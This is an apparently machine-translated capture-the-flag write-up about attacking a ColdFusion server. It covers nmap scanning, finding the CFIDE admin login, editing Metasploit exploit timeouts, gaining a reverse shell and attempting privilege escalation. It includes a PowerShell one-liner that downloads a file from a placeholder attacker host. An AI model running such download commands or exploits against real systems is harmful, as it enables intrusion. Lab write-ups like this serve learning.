information gathering

after nmap After scanning, only the following information was found .

And there is one of these ports fmtp The service is a little different , Go to the browser and have a look , Loading is a little slow .

stay CFIDE I saw Administrator file .

After loading ColdFusion Login interface .

So much information has been collected so far .

Turn it on

Go first exploit-db have a look

Go again msf have a look

Try two first excellent Of , The first upload failed for unknown reasons , It is speculated that the delay problem may lead to the failure , After modifying the time, it still fails , For a .

This one is also a failure , Consider delay , Go to source code modification delay .


Take these two 5 Change it a little bit .


After modifying and saving, return to msf, Execute first reload heavy load payload, Run again .

When you want to raise the right, you find that this task cannot be switched to the background , Then collect some information and make a pedal .

First find CFIDE The position of , See at a glance wwwroot, Then generate …… Why don't I directly generate .exe Well , All the wwwroot Just accept it here .

powershell "(new-object System.Net.WebClient).Downloadfile('http://IP/ file name ', ' file name ')"

Gained a rebound shell After use suggester An error will appear saying that the user has interrupted , However, I did nothing .

Doubt may be this rebound shell yes 32 The goal is 64 position , in ！

64 It's the same with you , I still have no operation , It also reports an error that the user interrupted the operation , All right .
I can only ask for strategies .（ Please forgive the blogger for being too stupid , I don't know the solution ）